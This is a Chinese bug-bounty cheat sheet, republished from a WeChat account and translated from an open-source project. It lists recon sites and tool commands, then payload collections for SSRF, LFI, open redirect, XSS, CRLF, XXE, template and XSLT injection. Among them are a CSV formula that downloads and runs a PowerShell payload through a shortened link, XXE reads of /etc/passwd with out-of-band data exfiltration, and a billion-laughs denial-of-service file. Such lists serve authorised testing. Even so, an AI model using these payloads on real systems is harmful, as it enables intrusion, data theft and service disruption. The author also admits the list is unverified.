众测备忘手册
From ChaMd5安全团队核心成员 MoonFish
前言
最近一直在看bugbountyforum对赏金猎人采访的文章以及一些分享姿势的PPT,所以结合bugbounty-cheatsheet项目对他们使用的工具,方法和思路进行整理。这里只是一个列表,并不是很详细,常见的姿势也不会被写上,还需要慢慢填充。
众测平台
HackerOne, Bugcrowd, BountyFactory,Intigriti,Bugbountyjp,Synack,Zerocopter,Cobalt,Yogosha工具以及一些tips
在线域名信息收集:
https://dnsdumpster.com
http://threatcrowd.org
https://publicwww.com(可以搜索js、css中的域名,收费)
http://reverseip.domaintools.com(C段)
https://mxtoolbox.com
https://virustotal.com
https://crt.sh/?q=%25.uber.com
https://google.com/transparencyreport/https/ct/
https://pentest-tools.com/information-gathering/google-hacking
https://censys.io/certificates?q=域名收集工具的小tips
利用sublist3r.py收集多个网站的子域名,下面的命令会从domains文件获取网站,然后输出子域名到对应的txt文件中
cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt利用apktool和linkfinder获取APP中的域名信息(前提是APP未加密混淆)
apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5sum | cut -d' ' -f1).smali" \;; python /root/linkfinder/linkfinder.py -i 'collection/*.smali' -o cli以某APP为例
详细输出结果可以在output.html中找到
Aquatone域名收集神器简化命令
将aquatone-discover -d $1 && aquatone-scan -d $1 --ports huge && aquatone-takeover -d $1 && aquatone-gather -d $1
写入aqua.sh
./aqua.sh xx.com获取页面中所有的链接
lynx -dump http://www.xxxxx.com/ | awk '/http/{print $2}'还有几款经常被提到的工具Intrigue-core、massdns、EyeWitness。
漏洞payload和绕过姿势
SSRF:
http://0177.1/
http://0x7f.1/
https://520968996(利用网站 http://www.subnetmask.info/)
IPv6
http://[::1]
http://[::]Wildcard DNS(例:乌云多数已修复SSRF漏洞可被绕过)
http://xip.io
http://nip.io监控DNS解析和HTTP访问记录的网站(类似dnslog/ceye,姿势参考freebuf《HTTP盲攻击》)
http://dnsbin.zhack.ca (DNS)
http://pingb.in (DNS)
http://requestb.in (HTTP)
https://www.mockbin.org/ (HTTP)LFI:
../\
..\/
/..\
/..
/%5c..
FFmpeg Local File Disclosure(搜狐优酷腾讯都出现过。)(https://github.com/neex/ffmpeg-avi-m3u-x bin/blob/master/gen_xbin_avi.py)OPEN REDIRECT:
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
example.com%23@whitelisted.com(bypass)
其他的一些payload
https://github.com/cujanovic/Open-Redirect-PayloadsXSS :
先知XSS挑战赛writeup:http://mp.weixin.qq.com/s/d_UCJusUdWCRTo3Vutsk_A
一个通用的xss payload:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e绕过url处的校验
javas	cript://www.google.com/%0Aalert(1)Markdown XSS
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))FLASH SWF XSS
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);// (国内一些框架之前出过这个问题,如thinkphp)
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swfAngular JS模板注入
CRLF:
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
利用跳转进行CRLF
//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header
利用crlf进行xss
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
参考:https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.htmlCSV Injection:
%0A-3+3+cmd|' /C calc'!D2
Meterpreter Shell
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
参考:http://bobao.360.cn/learning/detail/2997.htmlXXE Injection:
文件读取:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
外带数据(第一次请求不会返回数据)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
PHP案例
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>∾</result></foo>检测SSRF
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>XEE(拒绝服务https://yq.aliyun.com/articles/8723)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XEE(远程攻击)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>利用ftp协议传输数据(搜狗某站文件读取/列目录-Java环境Blind XXE)
详细:http://www.freebuf.com/articles/web/97833.html
https://github.com/RUB-NDS/DTD-Attacks
模板注入:
Ruby
<%=`id`%>
Twig
{{7*'7'}} 输出49
Jinja
{{7*'7'}}输出7777777XSLT 注入
获取信息
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>PHP利用
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
</body>
</html>尾声
本文根据开源项目bugbounty-cheatsheet(https://github.com/EdOverflow/bugbounty-cheatsheet/)翻译总结而成,由于译者时间比较紧张,未做详细验证,所以文章中有什么错误或者表哥想贡献思路,可以加我的微信bbqcms反馈。
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-11-01,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录